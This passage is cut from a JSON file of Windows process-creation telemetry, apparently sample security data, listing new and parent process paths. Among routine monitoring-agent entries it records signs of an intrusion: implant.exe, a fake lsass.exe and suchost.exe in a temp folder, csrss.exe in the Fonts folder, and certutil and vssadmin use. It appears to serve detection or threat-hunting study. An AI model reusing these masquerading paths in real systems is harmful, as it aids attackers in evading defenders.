State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"ParentProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring 